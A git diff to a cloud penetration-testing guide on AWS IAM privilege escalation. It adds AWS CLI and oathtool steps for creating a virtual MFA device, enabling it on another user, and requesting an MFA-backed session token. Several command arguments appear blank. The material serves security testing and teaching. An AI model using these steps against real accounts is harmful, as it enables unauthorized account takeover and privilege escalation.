diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md index 440ff931e..a35a26db9 100644 --- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-iam-privesc/README.md @@ -57,17 +57,40 @@ aws iam delete-access-key --access-key-id If you can create a new virtual MFA device and enable it on another user, you can effectively enroll your own MFA for that user and then request an MFA-backed session for their credentials. +**Prerequisites:** + +You can use any tool you want for the TOTP codes - oathtool is easy and lightweight. + +```bash +sudo apt install oathtool +sudo dnf install oathtool +sudo yum install oathtool +``` + **Exploit:** ```bash # Create a virtual MFA device (this returns the serial and the base32 seed) -aws iam create-virtual-mfa-device --virtual-mfa-device-name +aws iam create-virtual-mfa-device --virtual-mfa-device-name \ + --bootstrap-method Base32StringSeed --outfile /path/to/save/mfa-seed.txt -# Generate 2 consecutive TOTP codes from the seed, then enable it for the user -aws iam enable-mfa-device --user-name --serial-number \ +# Generate 2 consecutive TOTP codes from the seed + +oathtool --base32 --totp "" -w 1 + +# Enable the new device for the user +aws iam enable-mfa-device --user-name --serial-number \ --authentication-code1 --authentication-code2 ``` +**Authenticate:** + +Once you have a basic session as the target user, you can use the security token service to get an MFA-backed token. + +```bash +aws sts get-session-token --serial-number --token-code +``` + **Impact:** Direct privilege escalation by taking over a user's MFA enrollment (and then using their permissions). ### **`iam:CreateLoginProfile` | `iam:UpdateLoginProfile`**